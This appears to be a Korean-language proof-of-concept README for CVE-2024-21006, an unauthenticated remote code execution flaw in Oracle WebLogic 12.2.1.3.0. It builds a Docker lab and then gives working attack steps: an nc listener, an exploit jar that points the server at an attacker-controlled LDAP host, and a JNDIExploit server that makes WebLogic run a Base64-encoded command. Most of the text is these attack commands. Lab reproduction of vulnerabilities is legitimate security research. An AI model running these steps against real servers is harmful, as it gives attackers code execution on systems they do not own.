
원격 코드 실행 (RCE) - Oracle WebLogic 12.2.1.3.0
CVE-2024-21006는 Oracle WebLogic Server에 영향을 주는 치명적인 원격 코드 실행(RCE) 취약점입니다. 이 결함은 IIOP(Internet Inter-ORB Protocol) 및 JNDI(Java Naming and Directory Interface) 프로토콜의 안전하지 않은 사용과 관련되어 있으며, 인증되지 않은 원격 공격자가 악의적인 JNDI 참조를 통해 영향을 받는 서버에서 임의 코드를 실행할 수 있게 합니다.
환경을 구축합니다:
docker-compose up -d
Kali 셸에 접속하려면:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
WebLogic 셸에 접속하려면:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
ExploitBox 셸에 접속하려면:
docker exec -it exploitbox /bin/bash
이 단계에서는 로컬에서 실행 중인 WebLogic 12.2.1.3.0 인스턴스를 확인할 수 있습니다: http://127.0.0.1:7001/console/login/LoginForm.jsp

Kali에서:
nc -vnlp 1389
ExploitBox에서:
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 ldap://<IP do Kali>:1389
Kali에서 WebLogic으로부터의 연결을 받은 것을 확인할 수 있습니다:

Kali에서 JNDIExploit을 시작합니다:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP do Kali>

ExploitBox에서 익스플로잇을 실행합니다:
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 "ldap://<IP do Kali>:1389/Basic/Command/Base64/<Comando em Base64>"

Kali에서 요청을 받은 것을 확인할 수 있습니다:

WebLogic에서 명령이 실행되고 파일이 성공적으로 생성된 것을 확인할 수 있습니다:
